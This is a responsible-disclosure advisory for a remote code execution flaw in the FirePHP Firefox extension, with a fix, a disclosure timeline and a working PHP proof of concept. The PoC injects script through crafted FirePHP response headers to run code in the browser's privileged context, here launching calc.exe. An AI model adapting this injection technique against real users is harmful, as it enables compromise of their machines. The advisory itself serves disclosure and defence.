JAHx132 - FirePHP firefox plugin remote code execution

--------------------------------------------------------------------------------------------
20130417 - Justanotherhacker.com : FirePHP firefox plugin remote code execution
JAHx132 - http://www.justanotherhacker.com/advisories/JAHx132.txt
--------------------------------------------------------------------------------------------

FirePHP enables you to log to your Firebug Console using a simple PHP method call.
All data is sent via response headers and will not interfere with the content on your page.
FirePHP is ideally suited for AJAX development where clean JSON and XML responses are required.
[ Taken from: http://www.firephp.org/ ]


--- Vulnerability description ---
The extension does not sufficiently validate cell names in array data received from the remote 
host resulting in arbitrary script execution in the chrome privileged context if a user
inspects the malicious data in firephp.

Discovered by: Eldar "Wireghoul" Marcussen
Type: Remote Code Execution
Severity: High
Release: Responsible
Vendor: FirePHP - http://www.firephp.org/
Affected versions: All versions prior to 0.7.2


--- Proof of Concept ---
<?php
/*************************************************************
 * FirePHP Firefox plugin Remote code execution PoC                            *
 * Written by Wireghoul - http://www.justanotherhacker.com   *
 * Greetz to @bcoles urbanadventurer @malerisch              *
 *************************************************************/

// XUL code to launch calc.exe
$exploit =  '{"RequestHeaders":{"1":"1","2":"2","3":"3","4":"4","5":"5","6":"6","7":"7","8":"8","9":"9","UR<script>';
$exploit.= 'var lFile=Components.classes[\"@mozilla.org/file/local;1\"].createInstance(Components.interfaces.nsILocalFile);';
$exploit.= 'lFile.initWithPath(\"C:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\calc.exe\");';
$exploit.= 'var process=Components.classes[\"@mozilla.org/process/util;1\"].createInstance(Components.interfaces.nsIProcess);';
$exploit.= 'process.init(lFile);';
$exploit.= 'process.run(true,[],0);void(0);';
$exploit.= '<\/SCRIPT>":"PWNT"}}';

// Send FirePHP dump data
header("X-Wf-Protocol-1: http://meta.wildfirehq.org/Protocol/JsonStream/0.2");
header("X-Wf-1-Plugin-1: http://meta.firephp.org/Wildfire/Plugin/FirePHP/Library-FirePHPCore/0.3");
header("X-Wf-1-Structure-1: http://meta.firephp.org/Wildfire/Structure/FirePHP/Dump/0.1");
$payload= "X-Wf-1-1-1-1: ";
$payload.= strlen($exploit).'|'.$exploit."|\r\n";
header($payload);
?>
<html>
<head>
  <title>FirePHP Firefox plugin RCE PoC</title>
</head>
<body>
PWNT!
</body>
</html>


--- Solution ---
Upgrade to version 0.7.2


--- Disclosure time line ---
17-Apr-2013 - Public disclosure
17-Apr-2013 - New version available via mozilla addons
12-Apr-2013 - New version
12-Apr-2013 - Vendor acknowledge vulnerability
09-Apr-2013 - Vendor notified through email


No Clean Feed - Stop Internet Censorship in Australia
Creative Commons License
This weblog is licensed under a Creative Commons License.